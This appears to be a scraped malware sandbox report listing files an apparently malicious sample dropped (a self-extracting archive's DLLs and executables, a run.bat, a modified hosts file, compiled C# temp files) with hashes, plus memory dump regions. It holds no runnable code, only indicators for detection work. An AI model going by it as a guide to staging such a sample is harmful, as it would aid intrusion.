0ec813aeaa4cd94907f6dbe041923392316eeba2b14edfc413cf75971449bb5ebe7bd194239bf47c84661d5b35835add81b360c4c4a73218409ea34e3781cf9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Microsoft.Web.WebView2.Core.dll
Filesize
488KB

MD5
851fee9a41856b588847cf8272645f58

SHA1
ee185a1ff257c86eb19d30a191bf0695d5ac72a1

SHA256
5e7faee6b8230ca3b97ce9542b914db3abbbd1cb14fd95a39497aaad4c1094ca

SHA512
cf5c70984cf33e12cf57116da1f282a5bd6433c570831c185253d13463b0b9a0b9387d4d1bf4dddab3292a5d9ba96d66b6812e9d7ebc5eb35cb96eea2741348f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Microsoft.Web.WebView2.Wpf.dll
Filesize
43KB

MD5
34ec990ed346ec6a4f14841b12280c20

SHA1
6587164274a1ae7f47bdb9d71d066b83241576f0

SHA256
1e987b22cd011e4396a0805c73539586b67df172df75e3dded16a77d31850409

SHA512
b565015ca4b11b79ecbc8127f1fd40c986948050f1caefdd371d34ed2136af0aabf100863dc6fd16d67e3751d44ee13835ea9bf981ac0238165749c4987d1ae0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Monaco\fileaccess\node_modules\get-intrinsic\.nycrc
Filesize
139B

MD5
d0104f79f0b4f03bbcd3b287fa04cf8c

SHA1
54f9d7adf8943cb07f821435bb269eb4ba40ccc2

SHA256
997785c50b0773e5e18bf15550fbf57823c634fefe623cd37b3c83696402ad0a

SHA512
daf9b5445cfc02397f398adfa0258f2489b70699dfec6ca7e5b85afe5671fdcabe59edee332f718f5e5778feb1e301778dffe93bb28c1c0914f669659bad39c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Monaco\fileaccess\node_modules\hasown\.eslintrc
Filesize
43B

MD5
c28b0fe9be6e306cc2ad30fe00e3db10

SHA1
af79c81bd61c9a937fca18425dd84cdf8317c8b9

SHA256
0694050195fc694c5846b0a2a66b437ac775da988f0a779c55fb892597f7f641

SHA512
e3eca17804522ffa4f41e836e76e397a310a20e8261a38115b67e8b644444153039d04198fb470f45be2997d2c7a72b15bd4771a02c741b3cbc072ea6ef432e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Monaco\fileaccess\node_modules\hasown\.nycrc
Filesize
216B

MD5
c2ab942102236f987048d0d84d73d960

SHA1
95462172699187ac02eaec6074024b26e6d71cff

SHA256
948366fea3b423a46366326d0bb2e54b08abd1cf0b243678ba6625740c40da5a

SHA512
e36b20c16ceeb090750f3865efc8d7fd983ae4e8b41c30cc3865d2fd4925bf5902627e1f1ed46c0ff2453f076ef9de34be899ef57754b29cd158440071318479

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Monaco\fileaccess\node_modules\vary\LICENSE
Filesize
1KB

MD5
13babc4f212ce635d68da544339c962b

SHA1
4881ad2ec8eb2470a7049421047c6d076f48f1de

SHA256
bd47ce7b88c7759630d1e2b9fcfa170a0f1fde522be09e13fb1581a79d090400

SHA512
40e30174433408e0e2ed46d24373b12def47f545d9183b7bce28d4ddd8c8bb528075c7f20e118f37661db9f1bba358999d81a14425eb3e0a4a20865dfcb53182

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\VCRUNTIME140.dll
Filesize
99KB

MD5
7a2b8cfcd543f6e4ebca43162b67d610

SHA1
c1c45a326249bf0ccd2be2fbd412f1a62fb67024

SHA256
7d7ca28235fba5603a7f40514a552ac7efaa67a5d5792bb06273916aa8565c5f

SHA512
e38304fb9c5af855c1134f542adf72cde159fab64385533eafa5bb6e374f19b5a29c0cb5516fc5da5c0b5ac47c2f6420792e0ac8ddff11e749832a7b7f3eb5c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\WebView2Loader.dll
Filesize
133KB

MD5
a0bd0d1a66e7c7f1d97aedecdafb933f

SHA1
dd109ac34beb8289030e4ec0a026297b793f64a3

SHA256
79d7e45f8631e8d2541d01bfb5a49a3a090be72b3d465389a2d684680fee2e36

SHA512
2a50ae5c7234a44b29f82ebc2e3cfed37bf69294eb00b2dc8905c61259975b2f3a059c67aeab862f002752454d195f7191d9b82b056f6ef22d6e1b0bb3673d50

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Wpf.Ui.dll
Filesize
5.2MB

MD5
aead90ab96e2853f59be27c4ec1e4853

SHA1
43cdedde26488d3209e17efff9a51e1f944eb35f

SHA256
46cfbe804b29c500ebc0b39372e64c4c8b4f7a8e9b220b5f26a9adf42fcb2aed

SHA512
f5044f2ee63906287460b9adabfcf3c93c60b51c86549e33474c4d7f81c4f86cd03cd611df94de31804c53006977874b8deb67c4bf9ea1c2b70c459b3a44b38d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bin\path.txt
Filesize
33B

MD5
7207978deac3d2df817c0efb6de01f45

SHA1
1b547cb35c2e709dcf4132452cdb5b6ccd66044f

SHA256
14056051c638d943e3f6cd8ae99b7b8b8b4419f6e6193861081e519eeb4dc808

SHA512
d38226a5eb755aafe7e8e3d707b00841aea985bd8dedf20556800f1bb7ac7c807fa195bdd1e21014087f89b319ab278bec922951b7c682e9edd3fbee147834ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.dll
Filesize
5.2MB

MD5
8516475948d5cc69f60965d650b85a00

SHA1
c9558af61af110cec85c6477f4d5872acc9d40c0

SHA256
5037e6c632f221686441ac6fe141a5812c8557588baafc5966b748805dc6944a

SHA512
16b8b01473cb7600a64c51a51905e3a3d12408a251186b97c22698e3d9c051f46d3735db4fb7fe9040f00c55d2767be5b2c609bb0dfa8b63b1ef5d5aa20f2876

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
Filesize
85KB

MD5
f8f4522d11178a26e97e2046f249dfa7

SHA1
8b591d9a37716e235260fb6b3f601e4ccbebf15d

SHA256
3c372a8919c28dc76414b2f30da423c3e1018b1a8444527949ce20cc3fc93ed0

SHA512
52ea881cad501cf1d5e8ac47355e862ac1bd39cb6e1ff3d362d392b6f2d676e74878832505d17a552aaa3bc8f3977da11fa3f9903722eedd23716fb46ddb7492

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Extension State\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Extension State\MANIFEST-000001
Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Default\Shared Dictionary\cache\index
Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GraphiteDawnCache\data_0
Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GraphiteDawnCache\data_1
Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GraphiteDawnCache\data_2
Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\GraphiteDawnCache\data_3
Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c172d6e8f5ea8b8f824a6a7316.exe
Filesize
45KB

MD5
27ca5b53a280c1a51ddd5747c75ffa2d

SHA1
c048e5b059251149b79cd17d97229fed8757a0c5

SHA256
368b07f18cb7707d2be3af8ee87833d9192703fe6f02b7dcafccaca5d77125b9

SHA512
ddee5299ffaf9be41d024a1bc87bc09a87b58d8e1f4d7b6573b24fc9fdf1356db486d81c1038e98eb5a0ebf98c4f00db8c4337087c7bd5c8a742992e962e893b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd57e4c271d6e8f5ea8b8f824a6a7316.exe
Filesize
9.5MB

MD5
0889dc6a9d5342610e999004e88930e2

SHA1
48e3b0dbe575ae5d91698d0ad367b5d3cabddbe6

SHA256
40b8e8d3e54d7def940ff428a7d464aff3ecdb57bcb7053cc460d72c4290d091

SHA512
1031051593dd2624242b1b1bd581bb38b379a5b64a30cf067b0595f09be822a51c0d3001f48f93ece6675a6f95679317f637fc04fedd367071dbde3ad4f85607

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\libcurl.dll
Filesize
522KB

MD5
e31f5136d91bad0fcbce053aac798a30

SHA1
ee785d2546aec4803bcae08cdebfd5d168c42337

SHA256
ee94e2201870536522047e6d7fe7b903a63cd2e13e20c8fffc86d0e95361e671

SHA512
a1543eb1d10d25efb44f9eaa0673c82bfac5173055d04c0f3be4792984635a7c774df57a8e289f840627754a4e595b855d299070d469e0f1e637c3f35274abe6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.bat
Filesize
258B

MD5
d4900811b1e998ec72cc036816cbf334

SHA1
b6d37e7f23056167ab285fe56a47fe2377f6c606

SHA256
b5ee97397c792e8bdf904bc1da44212de1db1c192271d35f098df62abfffd070

SHA512
f518bf2f314973c5c4ed8c06062259354c2191c68fd02268299ce9f6f8d37bbda4810e995fdc7336fde29a8e3372b536f582a4098d322ce771eadd865d93cfee

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\zlib1.dll
Filesize
113KB

MD5
75365924730b0b2c1a6ee9028ef07685

SHA1
a10687c37deb2ce5422140b541a64ac15534250f

SHA256
945e7f5d09938b7769a4e68f4ef01406e5af9f40db952cba05ddb3431dd1911b

SHA512
c1e31c18903e657203ae847c9af601b1eb38efa95cb5fa7c1b75f84a2cba9023d08f1315c9bb2d59b53256dfdb3bac89930252138475491b21749471adc129a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2pkzd5yd.2k0.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gntaur1q\gntaur1q.dll
Filesize
4KB

MD5
d3de01f00290c7e93b49b3686294eec2

SHA1
318c714429501a59fcb6150168c119322446e606

SHA256
7b67856b496f45a7004c9c0b09b991964ff7564d63762c5d5ee7c2214d4bdf49

SHA512
63b43fbdb83ade2f734e5bbd4317a33935afab1c9954f6e1b0b0e3b291a7ef63c5a281e67c74ddb3c60bbd087995398bf6c5335dd694e51e767d95dc31aad8f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4C4B.tmp
Filesize
1KB

MD5
be5cfbcb0c2a9e354af2ac5a11ebe197

SHA1
c7efb0669961499a48dde818f962f21619958940

SHA256
fca5d075c55f7cc74325278940cf00f63a5291f6879875ee8e9ec4168de315d0

SHA512
00d6fd176600a242551dc5b90f0ad89edfaf3f103c640090d34ce3e7ee9c962bf30754bb3f38b58bd2e37ee2589f898785aa46f951802f019d5be9a460c553e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\zucewtWPJN\Display (1).png
Filesize
402KB

MD5
f4bda1d8067a6df8a53a339d8a6d1570

SHA1
83d6737732bc53fee0fff4ea2c7b02ade4068b59

SHA256
7ff2ccf9a795df63ddb4e86617771772a491aa1071d2cf616b19b641c750ba9f

SHA512
327ee0e492b89da3ab82604e3e88bd56f4cf04f8dbfca3a9c6c1408ceaa7effe02b03f388b8f1d1ed9c7ba8fa4ad8825262aa75e594e97e26d623d3eb0b59085

Download Submit
C:\Windows\System32\drivers\etc\hosts
Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gntaur1q\CSCEBC7FD232D7C478BAE43FE8039FC7AA5.TMP
Filesize
652B

MD5
09845858f5729994267952e90ac18d56

SHA1
675d51aaebc6a653a913216eb8c66f1ad50f4149

SHA256
df2334f4eb7d27615513b1cc7acc3d2a19879274162c7eb58b09c2f56f62ee80

SHA512
6273384ff3f551194520cfff4fe02934deb1f64f6d67c9af3e1791adc2c3b1f176c3956479f1da2706a39aad496cf78e0b3d66c6e6279258dcb60c0bf9ae18c9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gntaur1q\gntaur1q.0.cs
Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gntaur1q\gntaur1q.cmdline
Filesize
607B

MD5
878764946fae9a156cacc5252c95916d

SHA1
6b73e2cbf26cd08bd21c7f7e983ff65843d95d6d

SHA256
9f94f64750a021463d29d2b7ada5ffba19f21cd68c1aa70670160fc94aaf5787

SHA512
d1576c025c65e4ae34ab40b589a4fb6dc40d6c7c9c490cec1eabee64db20fd425e29946b47894d52bb178bc654b2895d38917a47cb324f0364d83d484c72049c

Download Submit
memory/688-1728-0x0000019DB1B90000-0x0000019DB1BB2000-memory.dmp

Filesize
136KB

Download
memory/2068-1688-0x00007FFADB083000-0x00007FFADB085000-memory.dmp

Filesize
8KB

Download
memory/2068-1809-0x0000000180000000-0x0000000180C32000-memory.dmp

Filesize
12.2MB

Download
memory/2068-1814-0x00007FFAD5BE0000-0x00007FFAD5C04000-memory.dmp

Filesize
144KB

Download
memory/2068-1717-0x0000016065D20000-0x0000016065D2E000-memory.dmp

Filesize
56KB

Download
memory/2068-1713-0x000001607FF10000-0x000001607FFCA000-memory.dmp

Filesize
744KB

Download
memory/2068-1698-0x0000016080450000-0x000001608098C000-memory.dmp

Filesize
5.2MB

Download
memory/2068-1813-0x0000000180000000-0x0000000180C32000-memory.dmp

Filesize
12.2MB

Download
memory/2068-1811-0x00007FFADB083000-0x00007FFADB085000-memory.dmp

Filesize
8KB

Download
memory/2068-1793-0x0000000180000000-0x0000000180C32000-memory.dmp

Filesize
12.2MB

Download
memory/2068-1715-0x000001607FDE0000-0x000001607FE5E000-memory.dmp

Filesize
504KB

Download
memory/2068-1796-0x0000000180000000-0x0000000180C32000-memory.dmp

Filesize
12.2MB

Download
memory/2068-1797-0x0000000180000000-0x0000000180C32000-memory.dmp

Filesize
12.2MB

Download
memory/2068-1798-0x0000000180000000-0x0000000180C32000-memory.dmp

Filesize
12.2MB

Download
memory/2068-1690-0x0000016065960000-0x000001606597A000-memory.dmp

Filesize
104KB

Download
memory/2068-1801-0x0000016065D30000-0x0000016065D38000-memory.dmp

Filesize
32KB

Download
memory/2068-1802-0x0000016065D90000-0x0000016065DC8000-memory.dmp

Filesize
224KB

Download
memory/2068-1803-0x0000016065D50000-0x0000016065D5E000-memory.dmp

Filesize
56KB

Download
memory/2068-1805-0x00007FFAD5BE0000-0x00007FFAD5C04000-memory.dmp

Filesize
144KB

Download
memory/2068-1804-0x0000000180000000-0x0000000180C32000-memory.dmp

Filesize
12.2MB

Download
memory/2096-1806-0x00000000050C0000-0x00000000050CA000-memory.dmp

Filesize
40KB

Download
memory/2096-1807-0x0000000005B00000-0x0000000005B92000-memory.dmp

Filesize
584KB

Download
memory/2096-1808-0x0000000006150000-0x00000000066F4000-memory.dmp

Filesize
5.6MB

Download
memory/2096-1795-0x00000000056B0000-0x0000000005716000-memory.dmp

Filesize
408KB

Download
memory/2760-1691-0x000000007536E000-0x000000007536F000-memory.dmp

Filesize
4KB

Download
memory/2760-1694-0x0000000000BF0000-0x0000000000C02000-memory.dmp

Filesize
72KB

Download
memory/4820-1779-0x00000272475C0000-0x00000272475C8000-memory.dmp

Filesize
32KB

Download